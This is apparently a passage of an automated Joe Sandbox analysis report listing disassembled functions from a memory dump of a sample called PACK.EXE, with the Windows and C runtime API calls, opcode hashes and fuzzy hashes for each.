                                                                                                                                              • Instruction ID: 046cc933069547e4c2313dc7e1fade64ad292b88df9cb79e99f39769acfa3b14
                                                                                                                                              • Opcode Fuzzy Hash: 5018b48a5951183a5bb13e574f01890349d603c11a0dd28a09e8374afdafcd99
                                                                                                                                              • Instruction Fuzzy Hash: AB31D57A1183469BC700DFA5C8809ABB7E8FF98704F04492EFA99C3211E730D559CB6A
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2931989736-0
                                                                                                                                              • Opcode ID: 0fb454f4e869ab262fb41b9304c20d87bb38e605e90df5ee7261ac9e7a5f065f
                                                                                                                                              • Instruction ID: e2e1919a397453ceb711249fed2e62a13db81fcfe6444782582b54d4212cca1b
                                                                                                                                              • Opcode Fuzzy Hash: 0fb454f4e869ab262fb41b9304c20d87bb38e605e90df5ee7261ac9e7a5f065f
                                                                                                                                              • Instruction Fuzzy Hash: BB21C47162020EABDB1C9E11DD81EBBF7AC9F547C8F14417AFE049A101E770EDA587A0
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(?,003200E0,00303394,003200E0,?,?,00302E0F,?,?,003200E0), ref: 0030851A
                                                                                                                                              • _free.LIBCMT ref: 0030854D
                                                                                                                                              • _free.LIBCMT ref: 00308575
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,003200E0), ref: 00308582
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,003200E0), ref: 0030858E
                                                                                                                                              • _abort.LIBCMT ref: 00308594
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                              • Opcode ID: 7efda27d115293fe943d6d9058700ea02cdb2d11b9e873d0edf4370082c102b8
                                                                                                                                              • Instruction ID: 4a7e3b1ba3ad8218631ba06fa6d72d4a8f9a212003869783ea38b27ca8e279e4
                                                                                                                                              • Opcode Fuzzy Hash: 7efda27d115293fe943d6d9058700ea02cdb2d11b9e873d0edf4370082c102b8
                                                                                                                                              • Instruction Fuzzy Hash: 32F0283564760067C30333347C2AF6F226D8BD67B1F264625F559AB2D1EE308E028124
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,003034E6,00000000,00000000,0030451B,?,0030451B,?,00000001,003034E6,?,00000001,0030451B,0030451B), ref: 0030B637
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0030B6C0
                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0030B6D2
                                                                                                                                              • __freea.LIBCMT ref: 0030B6DB
                                                                                                                                                • Part of subcall function 00307A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00302FA6,?,0000015D,?,?,?,?,00304482,000000FF,00000000,?,?), ref: 00307ABC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 2652629310-2989149754
                                                                                                                                              • Opcode ID: cc0902b6353d8d1d7d4beb15b4a38d9b1e815ba3f6f4d8f4e035d47683e31808
                                                                                                                                              • Instruction ID: 0334a0b21a68213d92f635fa993a52446b6c41c0c1db26308316e02aa561a092
                                                                                                                                              • Opcode Fuzzy Hash: cc0902b6353d8d1d7d4beb15b4a38d9b1e815ba3f6f4d8f4e035d47683e31808
                                                                                                                                              • Instruction Fuzzy Hash: 7B31B072A0120EABDF268F64CC65DAFBBA9EB44750F054128FC14DB190E736DD60CBA0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
                                                                                                                                                • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 002FC2F2
                                                                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 002FC308
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 002FC322
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 002FC32D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                                                              • String ID: RENAMEDLG
                                                                                                                                              • API String ID: 445417207-3299779563
                                                                                                                                              • Opcode ID: a76b65ce4d39a4e6a6259e8815632cc11002de8e887f3447df4d3a5464f68ff1
                                                                                                                                              • Instruction ID: 0d9eb47b8bdecfa348189de1d8125fb5126e88855e17e1ec6b6c87aededb1497
                                                                                                                                              • Opcode Fuzzy Hash: a76b65ce4d39a4e6a6259e8815632cc11002de8e887f3447df4d3a5464f68ff1
                                                                                                                                              • Instruction Fuzzy Hash: D701F5336A022D7AD2125EA46E84F76BB6CE75AB80F204025F701B6090C2A2AC219761
                                                                                                                                              APIs
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0030ABAF
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030ABD2
                                                                                                                                                • Part of subcall function 00307A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00302FA6,?,0000015D,?,?,?,?,00304482,000000FF,00000000,?,?), ref: 00307ABC
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0030ABF8
                                                                                                                                              • _free.LIBCMT ref: 0030AC0B
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030AC1A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                              • Opcode ID: 1502d66538a45a0002419a9ba60e56067f0037d4e32ef33e07a8b77d15f0670f
                                                                                                                                              • Instruction ID: ca79f8c68f090627d1f52f870e9f9b7a5b217f5b6b5d4be34aa29aaff7b506ef
                                                                                                                                              • Opcode Fuzzy Hash: 1502d66538a45a0002419a9ba60e56067f0037d4e32ef33e07a8b77d15f0670f
                                                                                                                                              • Instruction Fuzzy Hash: 8701D872603B147FB323967A7C5CCBF796DDACABA03174129FD04C7280DA608D0192B1
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00307ED1,00307B6D,?,00308544,00000001,00000364,?,00302E0F,?,?,003200E0), ref: 0030859F
                                                                                                                                              • _free.LIBCMT ref: 003085D4
                                                                                                                                              • _free.LIBCMT ref: 003085FB
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,003200E0), ref: 00308608
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,003200E0), ref: 00308611
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                              • Opcode ID: 8e3b5fa6fab62820cca46aff6c9e48f9f2095604895dd99e63f38f9c87131afe
                                                                                                                                              • Instruction ID: 993e0d458e690103acba30f90ece4eb33eec840b6398cfda1df98066cb209080
                                                                                                                                              • Opcode Fuzzy Hash: 8e3b5fa6fab62820cca46aff6c9e48f9f2095604895dd99e63f38f9c87131afe
                                                                                                                                              • Instruction Fuzzy Hash: 6A01F47A2076006BD71377386CA5A6B366D9BC63B5B274124FA85972C3EF329D018168
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002F0697: ResetEvent.KERNEL32(?), ref: 002F06A9
                                                                                                                                                • Part of subcall function 002F0697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002F06BD
                                                                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 002F03FB
                                                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 002F0415
                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 002F042E
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 002F043A
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 002F0446
                                                                                                                                                • Part of subcall function 002F04BA: WaitForSingleObject.KERNEL32(?,000000FF,002F05D9,?,?,002F064E,?,?,?,?,?,002F0638), ref: 002F04C0
                                                                                                                                                • Part of subcall function 002F04BA: GetLastError.KERNEL32(?,?,002F064E,?,?,?,?,?,002F0638), ref: 002F04CC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1868215902-0
                                                                                                                                              • Opcode ID: 109b801c959b7591521345961167f107ad1f9fac4101e804382886e0d7b613fc
                                                                                                                                              • Instruction ID: 78a7275388225cd7059c305c161c31298d1982883ffe8a99c2c9c4fa3466e5b4
                                                                                                                                              • Opcode Fuzzy Hash: 109b801c959b7591521345961167f107ad1f9fac4101e804382886e0d7b613fc
                                                                                                                                              • Instruction Fuzzy Hash: 58019272400708EBC7329B64DC84BD7FBADFB4C750F004629F25A92161C7756964CB90
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 0030B479
                                                                                                                                                • Part of subcall function 00307A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?), ref: 00307A66
                                                                                                                                                • Part of subcall function 00307A50: GetLastError.KERNEL32(?,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?,?), ref: 00307A78
                                                                                                                                              • _free.LIBCMT ref: 0030B48B
                                                                                                                                              • _free.LIBCMT ref: 0030B49D
                                                                                                                                              • _free.LIBCMT ref: 0030B4AF
                                                                                                                                              • _free.LIBCMT ref: 0030B4C1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                              • Opcode ID: de9b2e7e45c53a94137caf74cad83e2a7cd82a07e0fcc71e9f27c058aa208899
                                                                                                                                              • Instruction ID: ed47d2559c8edd8e5e2afe2eb7d3714701424214f6e6b5e7ba9dc95f2a442794
                                                                                                                                              • Opcode Fuzzy Hash: de9b2e7e45c53a94137caf74cad83e2a7cd82a07e0fcc71e9f27c058aa208899
                                                                                                                                              • Instruction Fuzzy Hash: 6EF03632A0A210ABC623DB75F896C5BF7FDAF05750B559805F04DEB691C734FE808A54
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 003075F9
                                                                                                                                                • Part of subcall function 00307A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?), ref: 00307A66
                                                                                                                                                • Part of subcall function 00307A50: GetLastError.KERNEL32(?,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?,?), ref: 00307A78
                                                                                                                                              • _free.LIBCMT ref: 0030760B
                                                                                                                                              • _free.LIBCMT ref: 0030761E
                                                                                                                                              • _free.LIBCMT ref: 0030762F
                                                                                                                                              • _free.LIBCMT ref: 00307640
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                              • Opcode ID: 38514ebd262979ef5672b1e129b8d998a99312701ba665de597ae959cc16a670
                                                                                                                                              • Instruction ID: 6b211af029398d13e573db32c4e5070c7640209d6127f3deaeefccc913dfe1e8
                                                                                                                                              • Opcode Fuzzy Hash: 38514ebd262979ef5672b1e129b8d998a99312701ba665de597ae959cc16a670
                                                                                                                                              • Instruction Fuzzy Hash: 32F01D78E0A2288BC60BAF26FD1545E37A8BB0A710B065515F2125E3B1CB3136118EC5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 0-2989149754
                                                                                                                                              • Opcode ID: ca4e7df9a14e1f4cc521906e5ca947d228e32178eff0779c8e5d092ea3ac1758
                                                                                                                                              • Instruction ID: 6bdfafab884b1ea87cf83f3df8ebfa0e28e2fde6b8ddd93ed6cf8712a374a5b4
                                                                                                                                              • Opcode Fuzzy Hash: ca4e7df9a14e1f4cc521906e5ca947d228e32178eff0779c8e5d092ea3ac1758
                                                                                                                                              • Instruction Fuzzy Hash: 0151B371F0620A9BDF179FA4C865FAEBBB8AF09314F150849F415AB2D2D734AD01CB61
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 00309FAF
                                                                                                                                                • Part of subcall function 00307DBB: IsProcessorFeaturePresent.KERNEL32(00000017,00307DAA,0000002C,0031A968,0030AF68,00000000,00000000,00308599,?,?,00307DB7,00000000,00000000,00000000,00000000,00000000), ref: 00307DBD
                                                                                                                                                • Part of subcall function 00307DBB: GetCurrentProcess.KERNEL32(C0000417,0031A968,0000002C,00307AE8,00000016,00308599), ref: 00307DDF
                                                                                                                                                • Part of subcall function 00307DBB: TerminateProcess.KERNEL32(00000000), ref: 00307DE6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                              • String ID: *?$.$S#~>
                                                                                                                                              • API String ID: 2667617558-205569129
                                                                                                                                              • Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                                                                                                                                              • Instruction ID: 6681759d5367b4f33c9f2e1149ba2bd6d572f05076e4316fd2015d63e2fae213
                                                                                                                                              • Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                                                                                                                                              • Instruction Fuzzy Hash: 1D51D675E0120AEFDF16DFA8C891AADB7F5EF48310F25416AE454E7382E6319E01CB50
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,00000104), ref: 00306CB3
                                                                                                                                              • _free.LIBCMT ref: 00306D7E
                                                                                                                                              • _free.LIBCMT ref: 00306D88
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                              • API String ID: 2506810119-1038607665
                                                                                                                                              • Opcode ID: ff594ef3a1af7485472a094be274fa5f8770f578dd9a8aa1156994e052ba41c0
                                                                                                                                              • Instruction ID: 6769d412c03bb350c63e191d75a8549499bc7fdb4a76a16eec8133ef6ca0b489
                                                                                                                                              • Opcode Fuzzy Hash: ff594ef3a1af7485472a094be274fa5f8770f578dd9a8aa1156994e052ba41c0
                                                                                                                                              • Instruction Fuzzy Hash: 3A31A071B02218AFDB23DF99DC9699EBBFCEF85310F114066F9049B295D6705E50CBA0
                                                                                                                                              APIs
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,00000000,?,?,0030EAAF,00000000,00000000,00000000), ref: 0030E803
                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0030EAAF,00000000,00000000,00000000,00000000,00000000,00303FBF,00000000,00303FBF,0031AA70), ref: 0030E831
                                                                                                                                              • GetLastError.KERNEL32(?,0030EAAF,00000000,00000000,00000000,00000000,00000000,00303FBF,00000000,00303FBF,0031AA70,00000010,0030D947,00000000,0031A9E8,00000010), ref: 0030E862
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 2456169464-2989149754
                                                                                                                                              • Opcode ID: c6805c5db41f86dcb25eded020588941e7ad07cf39bcaa7a0a3cbe8468795483
                                                                                                                                              • Instruction ID: 27285cc14c2daef84d816dc2314f7f0266317c9c21f65f62dc1ef7e3e9ba7c31
                                                                                                                                              • Opcode Fuzzy Hash: c6805c5db41f86dcb25eded020588941e7ad07cf39bcaa7a0a3cbe8468795483
                                                                                                                                              • Instruction Fuzzy Hash: 03317075B112199FDB19CF59DC919EAB7B8EB08700F0084BDE90AD7290D730AD80CF60
                                                                                                                                              APIs
